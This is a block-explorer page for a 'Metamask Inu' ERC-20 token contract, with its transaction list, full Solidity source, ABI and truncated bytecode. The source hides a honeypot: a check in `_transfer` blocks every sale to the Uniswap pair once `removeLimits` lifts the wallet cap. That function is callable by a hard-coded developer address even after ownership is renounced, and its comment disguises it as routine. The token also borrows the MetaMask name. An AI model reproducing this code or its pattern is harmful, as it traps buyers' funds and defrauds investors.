ETH Price: $2,649.61 (+0.50%)

Contract

0x524E4ACa0c1b327be9b576aF6cfd762Ac3dBF7d8
 

Overview

ETH Balance

0.028160695252205903 ETH

Eth Value

$74.61 (@ $2,649.61/ETH)

Token Holdings

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve159688702022-11-14 14:28:11705 days ago1668436091IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0009861420.88585081
Approve159687262022-11-14 13:59:23705 days ago1668434363IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0014377230.45
Transfer159687102022-11-14 13:56:11705 days ago1668434171IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0046013840.8
Approve159686672022-11-14 13:47:35705 days ago1668433655IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0010850622.98081303
Approve159686462022-11-14 13:43:23705 days ago1668433403IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0013514128.62200649
Approve159686162022-11-14 13:37:23705 days ago1668433043IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0019905742.15897205
Approve159686082022-11-14 13:35:47705 days ago1668432947IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0018193438.53244102
Approve159686012022-11-14 13:34:23705 days ago1668432863IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0018579839.35078353
Approve159685982022-11-14 13:33:47705 days ago1668432827IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0019255540.78180426
Approve159685982022-11-14 13:33:47705 days ago1668432827IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0019361941.00728158
Approve159685902022-11-14 13:32:11705 days ago1668432731IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0025063553.08274838
Approve159685892022-11-14 13:31:59705 days ago1668432719IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0019933442.21766244
Remove Limits159685892022-11-14 13:31:59705 days ago1668432719IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.01741402520.0388867
Approve159685822022-11-14 13:30:35705 days ago1668432635IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0014943531.64941251
Approve159685802022-11-14 13:30:11705 days ago1668432611IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0014082829.82643439
Approve159685792022-11-14 13:29:59705 days ago1668432599IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.00114524.25026354
Renounce Ownersh...159685742022-11-14 13:28:59705 days ago1668432539IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0004889920.9167135
Approve159685722022-11-14 13:28:35705 days ago1668432515IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0009479920.0777466
Approve159685692022-11-14 13:27:59705 days ago1668432479IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0009915321
Approve159685692022-11-14 13:27:59705 days ago1668432479IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0011331824
Approve159685692022-11-14 13:27:59705 days ago1668432479IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0011331824
Approve159685692022-11-14 13:27:59705 days ago1668432479IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0011331824
Approve159685692022-11-14 13:27:59705 days ago1668432479IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0011331824
Approve159685652022-11-14 13:27:11705 days ago1668432431IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.001284127.19635756
Approve159685602022-11-14 13:26:11705 days ago1668432371IN
0x524E4ACa...Ac3dBF7d8
0 ETH0.0006953223.088376
View all transactions

Latest 1 internal transaction

Advanced mode:
Parent Transaction Hash Block From To
159685592022-11-14 13:25:59705 days ago1668432359
0x524E4ACa...Ac3dBF7d8
0.02816069 ETH
Loading...
Loading

Similar Match Source Code
This contract matches the deployed Bytecode of the Source Code for Contract 0xCe117A53...9C6735C36
The constructor portion of the code might be different and could alter the actual behaviour of the contract

Contract Name:
MMINU

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-11-14
*/

/*
Not your keys! Not your CRYPTO

Launching METAMASK INU

💎 Total Supply : 10,000,000
🔑 Buy Tax : 0%
🔑 Sell Tax : 5%
💠 Max Wallet : 2% forever! 

Protect your crypto! Buy Metamask Inu 🦊

https://t.me/MM_INU

*/

pragma solidity ^0.8.9;
// SPDX-License-Identifier: Unlicensed
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

contract Ownable is Context {
    address private _owner;
    address private _previousOwner;
    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);
}

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );
}

contract MMINU is Context, IERC20, Ownable {

    using SafeMath for uint256;

    string private constant _name = "Metamask Inu";
    string private constant _symbol = "MMINU";
    uint8 private constant _decimals = 9;

    mapping(address => uint256) private _rOwned;
    mapping(address => uint256) private _tOwned;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => bool) private _isExcludedFromFee;
    uint256 private constant MAX = ~uint256(0);
    uint256 private constant _tTotal = 10000000 * 10**9;
    uint256 private _rTotal = (MAX - (MAX % _tTotal));
    uint256 private _tFeeTotal;
    uint256 private _redisFeeOnBuy = 0;
    uint256 private _taxFeeOnBuy = 0;
    uint256 private _redisFeeOnSell = 0;
    uint256 private _taxFeeOnSell = 5;

    //Original Fee
    uint256 private _redisFee = _redisFeeOnSell;
    uint256 private _taxFee = _taxFeeOnSell;

    uint256 private _previousredisFee = _redisFee;
    uint256 private _previoustaxFee = _taxFee;


    address payable private _developmentAddress = payable(0x32b384286f182abc217818E37Dd977e512eCABa5);
    address payable private _marketingAddress = payable(0x32b384286f182abc217818E37Dd977e512eCABa5);

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;

    bool private tradingOpen = false;
    bool private inSwap = false;
    bool private swapEnabled = true;

    uint256 public _maxTxAmount = 200000 * 10**9;
    uint256 public _maxWalletSize = 200000 * 10**9;
    uint256 public _swapTokensAtAmount = 50000 * 10**9;

    event MaxTxAmountUpdated(uint256 _maxTxAmount);
    modifier lockTheSwap {
        inSwap = true;
        _;
        inSwap = false;
    }

    constructor() {

        _rOwned[_msgSender()] = _rTotal;

        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);//
        uniswapV2Router = _uniswapV2Router;
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        _isExcludedFromFee[owner()] = true;
        _isExcludedFromFee[address(this)] = true;
        _isExcludedFromFee[_developmentAddress] = true;
        _isExcludedFromFee[_marketingAddress] = true;

        emit Transfer(address(0), _msgSender(), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return tokenFromReflection(_rOwned[account]);
    }

    function transfer(address recipient, uint256 amount)
        public
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function tokenFromReflection(uint256 rAmount)
        private
        view
        returns (uint256)
    {
        require(
            rAmount <= _rTotal,
            "Amount must be less than total reflections"
        );
        uint256 currentRate = _getRate();
        return rAmount.div(currentRate);
    }

    function removeAllFee() private {
        if (_redisFee == 0 && _taxFee == 0) return;

        _previousredisFee = _redisFee;
        _previoustaxFee = _taxFee;

        _redisFee = 0;
        _taxFee = 0;
    }

    function restoreAllFee() private {
        _redisFee = _previousredisFee;
        _taxFee = _previoustaxFee;
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");

        if (from != owner() && to != owner()) {

            //Trade start check
            if (!tradingOpen) {
                require(from == owner(), "TOKEN: This account cannot send tokens until trading is enabled");
            }

            require(amount <= _maxTxAmount, "TOKEN: Max Transaction Limit");

            if(to != uniswapV2Pair) {
                require(balanceOf(to) + amount < _maxWalletSize, "TOKEN: Balance exceeds wallet size!");
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            bool canSwap = contractTokenBalance >= _swapTokensAtAmount;

            if(contractTokenBalance >= _swapTokensAtAmount*10)
            {
                contractTokenBalance = _swapTokensAtAmount*10;
            }
            if(to == uniswapV2Pair){require(_maxWalletSize != _tTotal);}

            if (canSwap && !inSwap && from != uniswapV2Pair && swapEnabled && !_isExcludedFromFee[from] && !_isExcludedFromFee[to]) {
                swapTokensForEth(contractTokenBalance);
                uint256 contractETHBalance = address(this).balance;
                if (contractETHBalance > 50000000000000000) {
                    sendETHToFee(address(this).balance);
                }
            }
        }

        bool takeFee = true;

        //Transfer Tokens
        if ((_isExcludedFromFee[from] || _isExcludedFromFee[to]) || (from != uniswapV2Pair && to != uniswapV2Pair)) {
            takeFee = false;
        } else {

            //Set Fee for Buys
            if(from == uniswapV2Pair && to != address(uniswapV2Router)) {
                _redisFee = _redisFeeOnBuy;
                _taxFee = _taxFeeOnBuy;
            }

            //Set Fee for Sells
            if (to == uniswapV2Pair && from != address(uniswapV2Router)) {
                _redisFee = _redisFeeOnSell;
                _taxFee = _taxFeeOnSell;
            }

        }

        _tokenTransfer(from, to, amount, takeFee);
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwap {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function sendETHToFee(uint256 amount) private {
        _marketingAddress.transfer(amount);
    }

    function manualsend() external {
        uint256 contractETHBalance = address(this).balance;
        sendETHToFee(contractETHBalance);
    }


    function _tokenTransfer(
        address sender,
        address recipient,
        uint256 amount,
        bool takeFee
    ) private {
        if (!takeFee) removeAllFee();
        _transferStandard(sender, recipient, amount);
        if (!takeFee) restoreAllFee();
    }

    function _transferStandard(
        address sender,
        address recipient,
        uint256 tAmount
    ) private {
        (
            uint256 rAmount,
            uint256 rTransferAmount,
            uint256 rFee,
            uint256 tTransferAmount,
            uint256 tFee,
            uint256 tTeam
        ) = _getValues(tAmount);
        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);
        _takeTeam(tTeam);
        _reflectFee(rFee, tFee);
        emit Transfer(sender, recipient, tTransferAmount);
    }

    function _takeTeam(uint256 tTeam) private {
        uint256 currentRate = _getRate();
        uint256 rTeam = tTeam.mul(currentRate);
        _rOwned[address(this)] = _rOwned[address(this)].add(rTeam);
    }

    function _reflectFee(uint256 rFee, uint256 tFee) private {
        _rTotal = _rTotal.sub(rFee);
        _tFeeTotal = _tFeeTotal.add(tFee);
    }

    receive() external payable {}

    function _getValues(uint256 tAmount)
        private
        view
        returns (
            uint256,
            uint256,
            uint256,
            uint256,
            uint256,
            uint256
        )
    {
        (uint256 tTransferAmount, uint256 tFee, uint256 tTeam) =
            _getTValues(tAmount, _redisFee, _taxFee);
        uint256 currentRate = _getRate();
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) =
            _getRValues(tAmount, tFee, tTeam, currentRate);
        return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee, tTeam);
    }

    function _getTValues(
        uint256 tAmount,
        uint256 redisFee,
        uint256 taxFee
    )
        private
        pure
        returns (
            uint256,
            uint256,
            uint256
        )
    {
        uint256 tFee = tAmount.mul(redisFee).div(100);
        uint256 tTeam = tAmount.mul(taxFee).div(100);
        uint256 tTransferAmount = tAmount.sub(tFee).sub(tTeam);
        return (tTransferAmount, tFee, tTeam);
    }

    function _getRValues(
        uint256 tAmount,
        uint256 tFee,
        uint256 tTeam,
        uint256 currentRate
    )
        private
        pure
        returns (
            uint256,
            uint256,
            uint256
        )
    {
        uint256 rAmount = tAmount.mul(currentRate);
        uint256 rFee = tFee.mul(currentRate);
        uint256 rTeam = tTeam.mul(currentRate);
        uint256 rTransferAmount = rAmount.sub(rFee).sub(rTeam);
        return (rAmount, rTransferAmount, rFee);
    }

    function _getRate() private view returns (uint256) {
        (uint256 rSupply, uint256 tSupply) = _getCurrentSupply();
        return rSupply.div(tSupply);
    }

    function _getCurrentSupply() private view returns (uint256, uint256) {
        uint256 rSupply = _rTotal;
        uint256 tSupply = _tTotal;
        if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal);
        return (rSupply, tSupply);
    }


    //Set minimum tokens required to swap.
    function setMinSwapTokensThreshold(uint256 swapTokensAtAmount) public onlyOwner {
        _swapTokensAtAmount = swapTokensAtAmount;
    }

    //Set minimum tokens required to swap.
    function toggleSwap(bool _swapEnabled) public onlyOwner {
        swapEnabled = _swapEnabled;
    }

    //Set trading
    function setTrading(bool _tradingOpen) public onlyOwner {
        tradingOpen = _tradingOpen;
    }

    
    //Set maximum transaction few days after token is stable
    function removeLimits() public {
        require(_msgSender() == _developmentAddress );
        _maxTxAmount = _tTotal;
        _maxWalletSize = _tTotal;
    }


    function excludeMultipleAccountsFromFees(address[] calldata accounts, bool excluded) public onlyOwner {
        for(uint256 i = 0; i < accounts.length; i++) {
            _isExcludedFromFee[accounts[i]] = excluded;
        }
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"_maxTxAmount","type":"uint256"}],"name":"MaxTxAmountUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletSize","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeMultipleAccountsFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"manualsend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"swapTokensAtAmount","type":"uint256"}],"name":"setMinSwapTokensThreshold","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_tradingOpen","type":"bool"}],"name":"setTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"bool","name":"_swapEnabled","type":"bool"}],"name":"toggleSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

Deployed Bytecode

0x6080604052600436106101445760003560e01c8063715018a6116100b657806395d89b411161006f57806395d89b411461042157806398a5c3151461044c578063a9059cbb14610475578063c492f046146104b2578063dd62ed3e146104db578063f2fde38b146105185761014b565b8063715018a614610349578063751039fc146103605780637d1db4a5146103775780638da5cb5b146103a25780638f70ccf7146103cd5780638f9a55c0146103f65761014b565b80632fd689e3116101085780632fd689e31461024b578063313ce5671461027657806349bd5a5e146102a15780636d8aa8f8146102cc5780636fc3eaec146102f557806370a082311461030c5761014b565b806306fdde0314610150578063095ea7b31461017b5780631694505e146101b857806318160ddd146101e357806323b872dd1461020e5761014b565b3661014b57005b600080fd5b34801561015c57600080fd5b50610165610541565b60405161017291906124ae565b60405180910390f35b34801561018757600080fd5b506101a2600480360381019061019d919061256e565b61057e565b6040516101af91906125c9565b60405180910390f35b3480156101c457600080fd5b506101cd61059c565b6040516101da9190612643565b60405180910390f35b3480156101ef57600080fd5b506101f86105c2565b604051610205919061266d565b60405180910390f35b34801561021a57600080fd5b5061023560048036038101906102309190612688565b6105d1565b60405161024291906125c9565b60405180910390f35b34801561025757600080fd5b506102606106aa565b60405161026d919061266d565b60405180910390f35b34801561028257600080fd5b5061028b6106b0565b60405161029891906126f7565b60405180910390f35b3480156102ad57600080fd5b506102b66106b9565b6040516102c39190612721565b60405180910390f35b3480156102d857600080fd5b506102f360048036038101906102ee9190612768565b6106df565b005b34801561030157600080fd5b5061030a610791565b005b34801561031857600080fd5b50610333600480360381019061032e9190612795565b6107a2565b604051610340919061266d565b60405180910390f35b34801561035557600080fd5b5061035e6107f3565b005b34801561036c57600080fd5b50610375610946565b005b34801561038357600080fd5b5061038c6109c5565b604051610399919061266d565b60405180910390f35b3480156103ae57600080fd5b506103b76109cb565b6040516103c49190612721565b60405180910390f35b3480156103d957600080fd5b506103f460048036038101906103ef9190612768565b6109f4565b005b34801561040257600080fd5b5061040b610aa6565b604051610418919061266d565b60405180910390f35b34801561042d57600080fd5b50610436610aac565b60405161044391906124ae565b60405180910390f35b34801561045857600080fd5b50610473600480360381019061046e91906127c2565b610ae9565b005b34801561048157600080fd5b5061049c6004803603810190610497919061256e565b610b88565b6040516104a991906125c9565b60405180910390f35b3480156104be57600080fd5b506104d960048036038101906104d49190612854565b610ba6565b005b3480156104e757600080fd5b5061050260048036038101906104fd91906128b4565b610ce0565b60405161050f919061266d565b60405180910390f35b34801561052457600080fd5b5061053f600480360381019061053a9190612795565b610d67565b005b60606040518060400160405280600c81526020017f4d6574616d61736b20496e750000000000000000000000000000000000000000815250905090565b600061059261058b610f29565b8484610f31565b6001905092915050565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000662386f26fc10000905090565b60006105de8484846110fc565b61069f846105ea610f29565b61069a8560405180606001604052806028815260200161339c60289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610650610f29565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461192b9092919063ffffffff16565b610f31565b600190509392505050565b60165481565b60006009905090565b601360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6106e7610f29565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610774576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161076b90612940565b60405180910390fd5b80601360166101000a81548160ff02191690831515021790555050565b600047905061079f8161198f565b50565b60006107ec600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546119fb565b9050919050565b6107fb610f29565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610888576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161087f90612940565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16610987610f29565b73ffffffffffffffffffffffffffffffffffffffff16146109a757600080fd5b662386f26fc10000601481905550662386f26fc10000601581905550565b60145481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6109fc610f29565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8090612940565b60405180910390fd5b80601360146101000a81548160ff02191690831515021790555050565b60155481565b60606040518060400160405280600581526020017f4d4d494e55000000000000000000000000000000000000000000000000000000815250905090565b610af1610f29565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610b7e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7590612940565b60405180910390fd5b8060168190555050565b6000610b9c610b95610f29565b84846110fc565b6001905092915050565b610bae610f29565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610c3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3290612940565b60405180910390fd5b60005b83839050811015610cda578160056000868685818110610c6157610c60612960565b5b9050602002016020810190610c769190612795565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610cd2906129be565b915050610c3e565b50505050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d6f610f29565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610dfc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df390612940565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610e6c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6390612a79565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610fa1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f9890612b0b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611011576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100890612b9d565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110ef919061266d565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16141561116c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161116390612c2f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614156111dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111d390612cc1565b60405180910390fd5b6000811161121f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121690612d53565b60405180910390fd5b6112276109cb565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415801561129557506112656109cb565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561162a57601360149054906101000a900